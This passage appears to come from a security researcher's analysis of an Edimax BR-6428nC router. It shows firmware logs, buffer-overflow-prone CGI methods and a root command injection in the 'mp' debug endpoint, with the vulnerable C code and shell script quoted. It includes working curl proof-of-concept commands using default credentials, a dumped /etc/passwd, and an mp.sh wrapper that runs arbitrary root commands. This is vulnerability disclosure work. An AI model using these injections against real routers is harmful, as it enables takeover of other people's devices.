0 0 DROP all -- eth1 * 0.0.0.0/0 192.168.2.0/24
0 0 DROP tcp -- eth1 * 0.0.0.0/0 0.0.0.0/0 tcp dpt:80
Chain POSTROUTING (policy ACCEPT 9 packets, 918 bytes)
pkts bytes target prot opt in out source destination
3 218 MASQUERADE all -- * eth1 0.0.0.0/0 0.0.0.0/0
Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
#############################
# df #
#############################
#############################
# security log #
#############################
[2000-01-01 00:00:19]: start Dynamic IP
[2000-01-01 00:00:23]: [SNTP]: connect to TimeServer 72.30.35.88 ...
[2020-05-02 15:35:18]: [SNTP]: connect success!
[2020-05-02 15:35:18]: [SNTP]: set time to 2020-05-02 15:35:18
[2020-05-02 15:35:18]: [Firewall]: WAN1 IP is 192.168.86.32
[2020-05-02 15:35:18]: [Firewall]: WAN2 IP is 0.0.0.0
[2020-05-02 15:35:18]: [Firewall]: WAN3 IP is 0.0.0.0
[2020-05-02 15:35:18]: [Firewall]: setting firewall...
[2020-05-02 15:35:21]: [SNTP]: connect to TimeServer 144.76.100.49 ...
[2020-05-02 15:35:22]: [SNTP]: connect success!
[2020-05-02 15:35:22]: [SNTP]: set time to 2020-05-02 15:35:22
#############################
# SNTP log #
#############################
SNTP: ip = 144.76.100.49 tz_minute = 0 [GMT+00:00]
SNTP: SUCCESS, Sat May 2 15:35:22 2020
#############################
# DHCP client log #
#############################
# [2000-01-01 00:00:20]: start DHCP client log #
orig_subnet=255.255.255.0
OLD_IP=192.168.86.32
OLD_BROADCAST=192.168.86.255
OLD_SUBNET=255.255.255.0
OLD_ROUTER="192.168.86.1"
OLD_DOMAIN=lan
OLD_DNS="192.168.86.1"
#############################
# DNS log #
#############################
<<< Auto setting DNS >>>
Use command: --server=192.168.86.1
#############################
# Route log #
#############################
Date: 2000-01-01 00:00:21
delete old route rule-> Host: 192.168.86.0 Gateway: 0.0.0.0
delete old route rule-> Host: 192.168.2.0 Gateway: 0.0.0.0
#############################
# WAN1 Debug #
#############################
ping -c 3 168.95.1.1
PING 168.95.1.1 (168.95.1.1): 56 data bytes
64 bytes from 168.95.1.1: seq=0 ttl=49 time=290.000 ms
64 bytes from 168.95.1.1: seq=1 ttl=49 time=290.000 ms
64 bytes from 168.95.1.1: seq=2 ttl=49 time=290.000 ms
--- 168.95.1.1 ping statistics ---
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 290.000/290.000/290.000 ms
ping -c 3 220.210.194.67
PING 220.210.194.67 (220.210.194.67): 56 data bytes
--- 220.210.194.67 ping statistics ---
3 packets transmitted, 0 packets received, 100% packet loss
ping -c 3 www.google.com.tw
PING www.google.com.tw (216.58.207.67): 56 data bytes
64 bytes from 216.58.207.67: seq=0 ttl=55 time=20.000 ms
64 bytes from 216.58.207.67: seq=1 ttl=55 time=20.000 ms
64 bytes from 216.58.207.67: seq=2 ttl=55 time=10.000 ms
--- www.google.com.tw ping statistics ---
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 10.000/16.666/20.000 ms
ping www.flets
#############################
# syslog #
#############################
Jan 1 00:00:06 (none) syslog.info syslogd started: BusyBox v1.11.1
May 2 15:35:30 (none) user.notice syslog: Note: adding VIF, idx=0 Fl flags=0x0 IP=192.168.2.1 br0
May 2 15:35:30 (none) user.notice syslog: Note: adding VIF, idx=1 Fl flags=0x0 IP=192.168.86.32 eth1
Buffer Overflow
Some of the CGI methods listed in the previous section have a temporary memory on the stack which triggers a buffer overflow when exceeded.
ⓘ Edimax BR-6428nC v1.16: Methods with overflow potential
formAccept (Buffer: 200Byte; Parameters: {"submit-url"})
formReboot (Buffer: 200Byte; Parameters: {"submit-url"})
formApply (Buffer: 200Byte; Parameters: {"submit-url"})
formConnect (Buffer: 200Byte; Parameters: {"submit-url"})
formPasswordSetup (Buffer: 100Byte; Parameter: {"newpass", "oldpass"})
mp (Buffer: 500Byte; Parameters: {"command"})
Note: The parameter "submit-url" is used to set
window.location.replace in the responding javascript.ⓘ Proof-of-Concept
$ curl --User admin:1234 192.168.2.1/goform/mp --data 'command=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX' curl: (52) Empty reply from server
Shell Command Injection
From the CGI methods discussed in the previous section, the one that deserves special attention is the mp method, which allows to pass parameter to a shell script called rftest.sh with root priviledges in sequence. This offers the possibility of command injection. None of the other CGI methods allow this except formHwSet, which seems to be disabled. The mp method itself seems to have been designed for debugging the WLAN interface. One could easily disable it for a production environment by setting the C pre-compiler variable _HIDING_CGI_MP_PAGE_ accordingly.
ⓘ fmmgmt.c: mp()
#ifdef _HIDING_CGI_MP_PAGE_
void mp(webs_t wp, char_t *path, char_t *query)
{
char_t *command;
char temp[500];
FILE *ptr;
int i;
command = websGetVar(wp, T("command"), T(""));
websHeader(wp);//<html>
websWrite(wp, T("<head>\n"));
websWrite(wp, T(" <style>body { color: #333333; font: 9pt/18px \"Monospace\";font-weight:bold; }</style>\n"));
websWrite(wp, T("<script type=\"text/javascript\" src=\"/file/javascript.js\"></script>"));
websWrite(wp, T("</head>\n"));
websWrite(wp, T("<body>\n"));
websWrite(wp, T(" <form action=\"/goform/mp\" method=\"POST\" name=\"mp\">\n"));
websWrite(wp, T(" <input type=\"text\" name=\"command\" value=\"\"> <input type=\"submit\" value=\"GO\">\n"));
websWrite(wp, T("<input type=\"hidden\" name=\"getID\" value=\"\"> "));
websWrite(wp, T(" </form>\n"));
if(command)
{
if( strchr(command,';') !=NULL ) *strchr(command,';')='\0'; //如果有分號,把第一個分號改成\0
websWrite(wp, T("<font color=\"red\"># "));
for(i=0;i<strlen(command);i++)
{
switch(command[i])
{
case '\n': websWrite(wp, T("<br>\n")); break;
case ' ': websWrite(wp, T(" ")); break;
case '\0': websWrite(wp, T("")); break;
default: websWrite(wp, T("%c"),command[i]); break;
}
}
websWrite(wp, T("</font><br>\n"));
#ifdef __TARGET_BOARD__
sprintf(temp,"/bin/rftest.sh %s > /tmp/rftest.out",command);
#else
sprintf(temp,"../../script/rftest.sh %s > /tmp/rftest.out",command);
#endif
system(temp);
if((ptr=fopen("/tmp/rftest.out","r"))!=NULL)
{
while(fgets(temp,100, ptr)>0)
{
for(i=0;i<strlen(temp);i++)
{
switch(temp[i])
{
case '\n': websWrite(wp, T("<br>\n")); break;
case ' ': websWrite(wp, T(" ")); break;
case '\0': websWrite(wp, T("")); break;
default: websWrite(wp, T("%c"),temp[i]); break;
}
}
}
fclose(ptr);
system("rm -f /tmp/rftest.out");
}
}
websWrite(wp, T("\n</body><script type=\"text/javascript\">document.mp.command.focus()</script>\n"));
websFooter(wp);//</html>
websDone(wp, 200);
}
#endif
ⓘ rftest.sh
#!/bin/sh
if [ $# -lt 1 ]; then echo "Usage: $0 interface {wait|no]"; exit 1 ; fi
WLAN_INTERFACE="wlan0"
SET_WLAN="iwpriv $WLAN_INTERFACE set_mib"
WRITE_E2P="iwpriv $WLAN_INTERFACE e2p"
READ_E2P="iwpriv $WLAN_INTERFACE e2p"
CNT_TIME=2000
SLEEP_TIME=10
case "$1" in
"ENABLEWIRELESS")
/bin/wlan.sh ra0 1
brctl addif br0 ra0
;;
"CARRIER")
$SET_WLAN ATE=ATESTART
$SET_WLAN ATECHANNEL=$2
$SET_WLAN ATETXMODE=$3
$SET_WLAN ATETXMCS=$4
$SET_WLAN ATETXBW=$5
$SET_WLAN ATETXCNT=$6
$SET_WLAN ATETXFREQOFFSET=$7
$SET_WLAN ATE=TXFRAME
$SET_WLAN ATE=TXCARR
echo ateFunc = $1
echo ateChan = $2
echo ateMode = $3
echo MCS = $4
echo ateBW = $5
echo ateTxCount = $6
echo ateOffset = $7
;;
"OFFSET")
$SET_WLAN ATETXFREQOFFSET=$2
echo ateFunc = $1
echo ateOffset = $2
;;
"TXCONT")
$SET_WLAN ATE=ATESTART
$SET_WLAN ATECHANNEL=$2
$SET_WLAN ATETXMODE=$3
$SET_WLAN ATETXMCS=$4
$SET_WLAN ATETXBW=$5
$SET_WLAN ATETXCNT=$6
$SET_WLAN ATE=TXFRAME
$SET_WLAN ATETXANT=$7
$SET_WLAN ATE=TXCONT
if [ $7 = 0 ]; then
$SET_WLAN ATETXPOW0=$8
$SET_WLAN ATETXPOW1=$8
elif [ $7 = 1 ]; then
$SET_WLAN ATETXPOW0=$8
elif [ $7 = 2 ]; then
$SET_WLAN ATETXPOW1=$8
fi
echo ateFunc = $1
echo ateChan = $2
echo ateMode = $3
echo MCS = $4
echo ateBW = $5
echo ateTxCount = $6
echo ateAntenna = $7
echo ateGain = $8
;;
"CHANNEL")
$SET_WLAN ATECHANNEL=$2
$SET_WLAN ATE=TXFRAME
$SET_WLAN ATE=TXCONT
echo ateChan = $2
;;
"TXPOWER")
$SET_WLAN ATETXANT=$2
if [ $2 = 0 ]; then
$SET_WLAN ATETXPOW0=$3
$SET_WLAN ATETXPOW1=$3
elif [ $2 = 1 ]; then
$SET_WLAN ATETXPOW0=$3
elif [ $2 = 2 ]; then
$SET_WLAN ATETXPOW1=$3
fi
echo ateFunc = $1
echo ateAntenna = $2
echo ateGain = $3
;;
"TXPACKET")
$SET_WLAN ATE=ATESTART
$SET_WLAN ATEDA=FF:FF:FF:FF:FF:FF
$SET_WLAN ATESA=00:aa:bb:cc:dd:ee
$SET_WLAN ATEBSSID=01:22:33:44:55:66
$SET_WLAN ATECHANNEL=$2
$SET_WLAN ATETXMODE=$3
$SET_WLAN ATETXMCS=$4
$SET_WLAN ATETXBW=$5
$SET_WLAN ATETXCNT=$6
$SET_WLAN ATETXANT=$7
$SET_WLAN ATETXGI=0
$SET_WLAN ATETXLEN=1024
$SET_WLAN ATETXPOW0=$8
$SET_WLAN ATETXPOW1=$8
$SET_WLAN ATE=TXFRAME
echo ateFunc = $1
echo ateChan = $2
echo ateMode = $3
echo MCS = $4
echo ateBW = $5
echo ateTxCount = $6
echo ateAntenna = $7
echo ateGain = $8
;;
"RXFRAME")
$SET_WLAN ATE=ATESTART
$SET_WLAN ATECHANNEL=$2
$SET_WLAN ResetCounter=0
$SET_WLAN ATETXFREQOFFSET=$3
$SET_WLAN ATETXMODE=$4
$SET_WLAN ATETXMCS=$5
$SET_WLAN ATETXBW=$6
$SET_WLAN ATE=RXFRAME
$SET_WLAN ATERXANT=$7
$SET_WLAN ATERXFER=1
echo ateFunc = $1
echo ateChan = $2
echo ateOffset =$3
echo ateMode = $4
echo MCS = $5
echo ateBW = $6
echo ateAntenna = $7
;;
"RXFRAME_RESULT")
iwpriv ra0 stat | grep ^R | grep -v RTS | grep -v duplicate | grep -v resource
;;
"ATESTOP")
echo "ATESTOP"
$SET_WLAN ATE=ATESTART
;;
"E2PTXFREQOFFSET")
height=`iwpriv ra0 e2p 3A | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-4`
$WRITE_E2P 3A=$height$2
echo ateFunc = $1
echo $WRITE_E2P 3A=$height$2
;;
"READTX1")
tx11=`$READ_E2P 52 | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
tx12=`$READ_E2P 54 | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
tx13=`$READ_E2P 56 | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
tx14=`$READ_E2P 58 | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
tx15=`$READ_E2P 5A | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
tx16=`$READ_E2P 5C | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
tx17=`$READ_E2P 5E | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
echo "$tx11 $tx12 $tx13 $tx14 $tx15 $tx16 $tx17"
;;
"READTX2")
tx21=`$READ_E2P 60 | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
tx22=`$READ_E2P 62 | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
tx23=`$READ_E2P 64 | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
tx24=`$READ_E2P 66 | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
tx25=`$READ_E2P 68 | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
tx26=`$READ_E2P 6A | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
tx27=`$READ_E2P 6C | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
echo "$tx21 $tx22 $tx23 $tx24 $tx25 $tx26 $tx27"
;;
"READDELTA")
delta1=`$READ_E2P 50 | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
delta2=`$READ_E2P DE | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
delta3=`$READ_E2P E0 | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
delta4=`$READ_E2P E2 | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
delta5=`$READ_E2P E4 | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
delta6=`$READ_E2P E6 | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
delta7=`$READ_E2P E8 | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
delta8=`$READ_E2P EA | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
delta9=`$READ_E2P EC | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
delta10=`$READ_E2P EE | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
echo "$delta1 $delta2 $delta3 $delta4 $delta5 $delta6 $delta7 $delta8 $delta9 $delta10"
;;
"READEEPALL")
START=$2
END=$3
ADDR=$START
while [ $ADDR -le $END ];
do
DATA=`$READ_E2P $ADDR | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
echo $ADDR:"$DATA"
ADDR=`expr $ADDR + 2`
done
;;
"READE2P")
readValue=`iwpriv ra0 e2p $2 | grep :0x | grep -v grep | cut -f 2 -d : | cut -b 3-6`
echo $readValue
;;
"E2PTX1")
$WRITE_E2P 52=$2
$WRITE_E2P 54=$3
$WRITE_E2P 56=$4
$WRITE_E2P 58=$5
$WRITE_E2P 5A=$6
$WRITE_E2P 5C=$7
$WRITE_E2P 5E=$8
;;
"E2PTX2")
$WRITE_E2P 60=$2
$WRITE_E2P 62=$3
$WRITE_E2P 64=$4
$WRITE_E2P 66=$5
$WRITE_E2P 68=$6
$WRITE_E2P 6A=$7
$WRITE_E2P 6C=$8
;;
"E2PDELTA")
$WRITE_E2P 50=$2
$WRITE_E2P DE=$3
$WRITE_E2P E0=$4
$WRITE_E2P E2=$5
$WRITE_E2P E4=$6
$WRITE_E2P E6=$7
$WRITE_E2P E8=$8
$WRITE_E2P EA=$9
$WRITE_E2P EC=$10
$WRITE_E2P EE=$11
;;
"RESETE2P")
ifconfig ra0 down
ifconfig ra1 down
ifconfig ra2 down
ifconfig ra3 down
ifconfig ra4 down
ifconfig ra5 down
ifconfig ra6 down
ifconfig ra7 down
ifconfig apcli0 down
iwpriv ra0 e2p 0=0
ifconfig ra0 down
ifconfig ra0 up
brctl addif br0 ra0
;;
"SETPN")
eval `cat /web/FUNCTION_SCRIPT | grep _MODE_`
eval `cat /web/FUNCTION_SCRIPT | grep _MODEL_`
flash set HW_11N_RESERVED8 1
HW_WLAN_ADDR7=$2
flash set HW_WLAN_ADDR7 $HW_WLAN_ADDR7
PIN_CODE=`flash get HW_WLAN_ADDR7 | cut -d '=' -f 2 | cut -b 3-`
if [ "$_MODE_" = "Buffalo" ]; then
AutoWPAKey=`AutoWPA $PIN_CODE wpamac`
else
AutoWPAKey=`AutoWPA $PIN_CODE`
fi
flash set WLAN_WPA_PSK $AutoWPAKey
echo PIN_CODE=$PIN_CODE
echo WLAN_WPA_PSK=$AutoWPAKey
;;
"PINCODE")
PIN_CODE=`flash get WPS_PIN_CODE | cut -d '=' -f 2 |cut -d "'" -f 2`
echo PINCODE=$PIN_CODE
;;
"WRITEDATA")
flash set HW_REG_DOMAIN $2
echo "`flash get HW_REG_DOMAIN`"
flash set HW_NIC0_ADDR $3
echo "`flash get HW_NIC0_ADDR`"
flash set HW_NIC1_ADDR $4
echo "`flash get HW_NIC1_ADDR`"
flash set HW_WLAN_ADDR $3
echo "`flash get HW_WLAN_ADDR`"
if [ "$5" != "" ]; then
flash set HW_WLAN_ADDR1 $5
echo "`flash get HW_WLAN_ADDR1`"
if [ "$6" != "" ]; then
flash set HW_WLAN_ADDR2 $6
echo "`flash get HW_WLAN_ADDR2`"
if [ "$7" != "" ]; then
flash set HW_WLAN_ADDR3 $7
echo "`flash get HW_WLAN_ADDR3`"
if [ "$8" != "" ]; then
flash set HW_WLAN_ADDR4 $8
echo "`flash get HW_WLAN_ADDR4`"
if [ "$9" != "" ]; then
flash set HW_WLAN_ADDR5 $9
echo "`flash get HW_WLAN_ADDR5`"
if [ "$10" != "" ]; then
flash set HW_WLAN_ADDR6 $10
echo "`flash get HW_WLAN_ADDR6`"
if [ "$11" != "" ]; then
flash set HW_WLAN_ADDR7 $11
echo "`flash get HW_WLAN_ADDR7`"
fi
fi
fi
fi
fi
fi
fi
;;
"READDATA")
LANMAC=`flash get HW_NIC0_ADDR`
WANMAC=`flash get HW_NIC1_ADDR`
WLANMAC=`flash get HW_WLAN_ADDR`
WLANMAC1=`flash get HW_WLAN_ADDR1`
WLANMAC2=`flash get HW_WLAN_ADDR2`
WLANMAC3=`flash get HW_WLAN_ADDR3`
WLANMAC4=`flash get HW_WLAN_ADDR4`
WLANMAC5=`flash get HW_WLAN_ADDR5`
WLANMAC6=`flash get HW_WLAN_ADDR6`
WLANMAC7=`flash get HW_WLAN_ADDR7`
DOMAIN=`flash get HW_REG_DOMAIN`
echo "$DOMAIN"
echo "$LANMAC"
echo "$WANMAC"
echo "$WLANMAC"
echo "$WLANMAC1"
echo "$WLANMAC2"
echo "$WLANMAC3"
echo "$WLANMAC4"
echo "$WLANMAC5"
echo "$WLANMAC6"
echo "$WLANMAC7"
echo "`cat /web/FUNCTION_SCRIPT | grep _MODE_= | cut -f 2`"
if [ "`cat /web/FUNCTION_SCRIPT | grep _MODE_= | cut -f 2 -d \\\"`" = "PCI" ]; then
MODEL="`cat /web/FUNCTION_SCRIPT | grep _MODEL_= | cut -f 2 -d \\\"`"
echo _MODEL_="\"$MODEL\""
else
echo "`cat /web/FUNCTION_SCRIPT | grep _MODEL_= | cut -f 2`"
fi
if [ "`cat /web/FUNCTION_SCRIPT |grep FIX_VERSION`" ]; then
echo "Version=`cat /etc/version|cut -f 1 -d \"-\"`"
else
echo "Version=`cat /etc/version`"
fi
echo "`flash get HW_11N_TRSWITCH`"
echo "`flash get WPS_PIN_CODE`"
if [ "`cat /web/FUNCTION_SCRIPT |grep FIX_VERSION`" ]; then
echo "Rev=`cat /etc/version|cut -f 2 -d \"-\"`"
fi
;;
"SETMAC")
flash set HW_NIC0_ADDR $2
flash set HW_NIC1_ADDR $3
flash set HW_WLAN_ADDR $2
FMAC1=`echo $2 | cut -b 0-2`
FMAC2=`echo $2 | cut -b 3-4`
FMAC3=`echo $2 | cut -b 5-6`
FMAC4=`echo $2 | cut -b 7-8`
FMAC5=`echo $2 | cut -b 9-10`
FMAC6=`echo $2 | cut -b 11-12`
iwpriv ra0 e2p 4=$FMAC2$FMAC1
iwpriv ra0 e2p 6=$FMAC4$FMAC3
iwpriv ra0 e2p 8=$FMAC6$FMAC5
if [ "$4" != "" ]; then
flash set HW_REG_DOMAIN $4
fi
if [ "$5" != "" ]; then
ifconfig $_WAN_IF_ $5
fi
ifconfig eth2 down
ifconfig eth2 hw ether $2
ifconfig eth2 up
if [ "$_IS_GATEWAY_" = "y" ]; then
ifconfig $_LAN_IF_ down
ifconfig $_LAN_IF_ hw ether $2
ifconfig $_LAN_IF_ up
brctl delif br0 $_LAN_IF_
brctl addif br0 $_LAN_IF_
ifconfig $_WAN_IF_ down
ifconfig $_WAN_IF_ hw ether $3
ifconfig $_WAN_IF_ up
fi
ifconfig ra0 down
ifconfig ra0 up
brctl delif br0 ra0
brctl addif br0 ra0
;;
"ATED")
vconfig add eth2 1
ifconfig $_LAN_IF_ up
brctl addif br0 $_LAN_IF_
killall ated
sleep 1
ated
;;
"TRSW")
flash set HW_11N_TRSWITCH $2
echo "`flash get HW_11N_TRSWITCH`"
;;
"GENPIN")
flash set WPS_PIN_CODE ""
flash gen-pin
;;
"PCI_SSID")
mac_last_6="`flash get HW_WLAN_ADDR | cut -b20-`"
echo "Main SSID=ap-pc-${mac_last_6}"
echo "Multiple SSID1=ap-game-${mac_last_6}"
;;
"BUTTONTESTSTART")
echo 1 > /proc/wlan_led
echo 1 > /proc/power_led
kill -9 `pidof cleanlog.sh`
kill -9 `pidof reload`
echo "finish!"
;;
"BUTTONTESTEND")
/bin/reload &
/bin/cleanlog.sh &
echo 2 > /proc/wlan_led
echo "finish!"
;;
"BUTTONTEST")
if [ -f "/proc/pci_threeway_switch" ]; then
temp="`cat /proc/pci_threeway_switch`"
else
temp="`cat /proc/rf_switch`"
fi
echo "RF_switch:"$temp
;;
"WPSBUTTONTEST")
wpspush="`cat /proc/wps_but`"
echo "WPS button pushed :"$wpspush
;;
"LANWANBRIDGE")
ifconfig eth1 down
echo 1 > /proc/wan_port
brctl addif br0 eth1
ifconfig eth1 up
;;
"COMMAND")
if [ "$2" = "ifconfig" ] || [ "$2" = "brctl" ] || [ "$2" = "flash" ] || [ "$2" = "cat" ] || [ "$2" = "echo" ] || [ "$2" = "cd" ] || [ "$2" = "sleep" ] || [ "$2" = "kill" ] || [ "$2" = "iwpriv" ] || [ "$2" = "reboot" ] || [ "$2" = "ated" ] || [ "$2" = "AutoWPA" ] || [ "$2" = "iperf" ] ; then
$2 $3 $4 $5 $6
fi
;;
esac
When calling http://edimax.setup/goform/mp by Get or Post one can send multiple values for the parameter command as one can see from the rftest.sh. There is one special command called COMMAND. The special about this command is that it accepts multiple space-delimited parameters. The script then compares the second value of the command against a list of accepted values, including ifconfig, brctl, flash, cat, echo, cd, sleep, kill, iwpriv, reboot, ated, AutoWPA, iperf. These commands in themselves are already very interesting but once the script detects one of the values before as second parameter ($2) after COMMAND ($1), it will execute $2 $3 $4 $5 $6. (e.g. "command=COMMAND $1 $2 $3 $4 $5 $6") Any additional parameter will be omitted. Now, when sending command=COMMAND echo "$(████████)" or command=COMMAND echo "`████████`" one can execute almost any command represented by █ here. It somehow failed when using ||, ; or &&.
ⓘ Proof-of-Concept
$ curl --User admin:1234 192.168.2.1/goform/mp --data 'command=COMMAND echo $(pwd)' /etc/boa
Note:
pwd is not in the list of allowed commands.Note: A list of available commands can be found from the firmware extraction.
ⓘ Example 1: cat /etc/passwd
$ curl --User admin:1234 192.168.2.1/goform/mp --data 'command=COMMAND cat /etc/passwd' root:x:0:0:root:/root:/bin/sh bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail: news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp: operator:x:11:0:operator:/root: games:x:12:100:games:/usr/games: gopher:x:13:30:gopher:/usr/lib/gopher-data: ftp:x:14:50:FTP User:/var/ftp: nobody:x:99:99:Nobody:/: nscd:x:28:28:NSCD Daemon:/:/bin/false mailnull:x:47:47::/var/spool/mqueue:/dev/null ident:x:98:98:pident user:/:/bin/false rpc:x:32:32:Portmapper RPC user:/:/bin/false rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/bin/false xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false john:x:500:500:John Huang:/home/john:/bin/tcsh dliu:x:501:501::/home/dliu:/bin/tcsh odysseus:x:502:502::/home/odysseus:/bin/tcsh ygtai:x:503:503::/home/ygtai:/bin/tcsh hcjong:x:504:504::/home/hcjong:/bin/tcsh rpm:x:37:37::/var/lib/rpm:/bin/bash ntp:x:38:38::/etc/ntp:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin radvd:x:75:75:radvd user:/:/bin/false postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash apache:x:48:48:Apache:/var/www:/bin/false squid:x:23:23::/var/spool/squid:/dev/null named:x:25:25:Named:/var/named:/bin/false pcap:x:77:77::/var/arpwatch:/bin/nologin ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false
Note: No according
shadow file has been found.ⓘ Example 2: GENPIN
$ curl --User admin:1234 192.168.2.1/goform/mp --data 'command=GENPIN' Get last 8 characters of HW_NIC0_ADDR = 38F8DEE4 Generate MAC = 955834084 Generate 10 PIN numbers = 955834084 ping code 58340844 Generated PIN = 58340844
ⓘ Example 3: echo $USER
$ curl --User admin:1234 192.168.2.1/goform/mp --data 'command=COMMAND echo $USER' root
Besides having the possibility to inject nested commands to the script fttest.sh, the mp method in fmmgmt.c, who calls that script, provides yet another option for code injection which is based on the same CGI call, but instead of using the script fttest.sh itself in combination with nested commands, we can ignore that script by not passing any parameters to it and using a pipe (|) instad to execute any other command. This we will use the system() call in the mp() method directrly to subsequently execute or inject commands. Simplified: system(/bin/rftest.sh ████████ > /temp/rftest.out). ████████ stands for the parameter command=COMMAND | ████████ send with the CGI call, and can be replaced by any command you would usually use when having access to a root shell. But beware that only the stdout stream that will reach > /tmp/rftest.out, will be send back to the CGI caller. A simple REGEX could easyly prevent this kind of injection by filtering incomming commands containing |&$`"; or any other method able of detecting illegal characters to prevent unintended command executions. The code only checks for the first occurance of ;, nothing more.
ⓘ mp.sh: For a more comfortable use. Also removes the HTML body.
#!/bin/bash
USER="admin"
PASS="1234"
IP="192.168.2.1"
curl --user $ADMIN:$PASS $IP/goform/mp --data "command=COMMAND | $1" 2>/dev/null |\
sed "s/ / /g" |\
sed "s/<br>//g" |\
tail -n +10 |\
head -n -3
ⓘ Proof-of-Concept
$ ./mp.sh "ls -C /sbin /bin /usr/bin /usr/sbin" /usr/sbin: crond udhcpd pppd /usr/bin: arping tail head basename tr cut killall wc top expr /bin: accessctl.sh iptables webs sntpclock mssid.sh BSrestoreChan.sh http_proxy.sh lld2d mini_upnpd wlanapp.sh hwset.sh txpower_select.sh ez-ipupdate scriptlib.sh mknod setpppoe.sh portfw.sh sch_reboot.sh detect_Link.sh alg.sh ping init_ap.sh pidof vlan.sh ash dnrd l2tp.sh cleanlog.sh txpower_INDIA.sh reset.sh interrupt.sh wpstool date.sh txpower.sh pptpd.sh edx_cloud dhcpc.sh del-route.sh l2tpd fixedip.sh vserver.sh ls killapp.sh wlan.sh mount touch sleep dnrd.sh cp triggerport.sh upnp.sh pppoe.sh run_iqv2.sh ipup.sh init.sh wps_Led.sh wan-status.sh QoS.sh mkdir wps_daemon.sh parentalcontrol.sh debugMsg.sh wscd getstatus.sh savelog.sh nbnsd intrusion.sh multidmz.sh firewall.sh urlblocking.sh miniupnp.sh setl2tp.sh l2tp_2.sh busybox sntp.sh ps setsip.sh remote.sh radio_on_off.sh igmpproxy rm txpower_V3.sh ipcalc watchdog.sh miniigd ddns.sh grep wlan2band.sh ip axhttpd sh nbtscan disconnect.sh pod.sh iapp create_l2tp_conf.sh wiz_dhcpc.sh pptp pppd rftest.sh date setssidmac.sh scriptlib_util.sh urlname.sh pppoe fping seclog.sh ezqos.sh duallaccess.sh ln sdmzWanCheck.sh pppoeloop.sh mssid2.sh wps.sh wlan_scan syslog.sh brctl reboot.sh setup flash syn-flood.sh noip2 auth lanwanaccess.sh connect.sh cat echo dhcpd.sh setdip.sh iwpriv pptp.sh wlanScan.sh saveiq.sh setpptp.sh tc 